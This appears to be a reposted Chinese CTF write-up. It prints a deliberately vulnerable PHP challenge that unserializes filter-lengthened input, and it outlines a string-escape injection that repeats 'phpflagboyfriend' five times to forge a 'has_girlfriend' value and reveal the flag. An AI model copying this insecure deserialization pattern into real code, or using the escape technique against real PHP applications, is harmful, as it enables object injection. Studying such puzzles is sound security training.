填坑填坑 上次講了插進去 這次講懟出去
看題!!! 不知道哪個比賽的題目
<?php
include ('flag.php');
error_reporting(0);
function filter($payload){
$key = array('php','flag','boyfriend');
$filter = '/'.implode('|',$key).'/i';
return preg_replace($filter,'hack!!!!',$payload);
}
$payload=$_GET['payload'];
$GDUT['A&D']='666';
$GDUT['Hed9eh0g']='no_girlfriend';
if(isset($payload)) {
if (strpos($payload, 'php')===false && strpos($payload, 'flag')===false && strpos($payload, 'boyfriend')===false) {
echo 'fuck_no_key!!!';
}else{
$GDUT['A&D']=$payload;
$GDUT=unserialize(filter(serialize($GDUT)));
if ($GDUT['Hed9eh0g'] === 'has_girlfriend') {
echo $flag;
} else {
echo 'fuck_no_girlfriend!!!';
}
}
}else{
highlight_file(__FILE__);
}
思路:
- 填充16個字符變成24個 一次多八個
- 理想序列化后的資料
a:2:{s:3:“A&D”;s:3:“666”;s:8:“Hed9eh0g”;s:14:“has_girlfriend”;}
- 所以我們要填充”;s:8:“Hed9eh0g”;s:14:“has_girlfriend”;}
這么多字符資料 一共四十個字符 - 所以構造五次phpflagboyfriend逃逸出去
看這道題,濃濃的戀愛酸臭味,看來是情人節快到了,md
祝各位師傅早日脫單,別忘了給弟弟來一個
重點!!!
弟弟今年沒那么多,別找太大的,謝謝師傅們,富婆無視以上條件!!!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/258360.html
標籤:其他